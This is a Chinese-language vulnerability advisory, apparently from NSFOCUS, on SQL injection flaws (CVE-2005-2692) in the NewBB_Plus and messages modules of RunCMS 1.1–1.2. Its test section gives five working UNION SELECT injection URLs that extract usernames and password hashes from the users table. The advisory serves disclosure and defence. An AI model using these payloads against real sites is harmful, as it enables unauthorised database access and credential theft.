首页 -> 安全研究

安全研究

安全漏洞
RunCMS NewBB_Plus和消息模块多个SQL注入漏洞

发布日期:2005-08-23
更新日期:2005-08-23

受影响系统:
RunCMS RunCMS 1.2
RunCMS RunCMS 1.1A
RunCMS RunCMS 1.1
描述:
BUGTRAQ  ID: 14631
CVE(CAN) ID: CVE-2005-2692

RunCMS是一个用PHP编写的内容管理系统。

RunCMS的实现上存在多个输入验证漏洞,远程攻击者可能利用此漏洞非授权访问数据库。

RunCMS对多个脚本的没有对用户请求参数数据做充分的检查过滤,远程攻击者可能在数据中插入特定的SQL语句序列从而对数据库执行授权的操作。

<*来源:James Bercegay (security@gulftech.org
        NT (NT@IHSTeam.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112439215217671&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/

http://www.example.com/runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2'&topic_id=2&viewmode=flat&order=0

http://www.example.com/runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2&topic_id=2&viewmode=flat&order=0

http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_pn

http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_sent_pn

建议:
厂商补丁:

RunCMS
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.runcms.org/public/modules/news/

浏览次数:2944
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障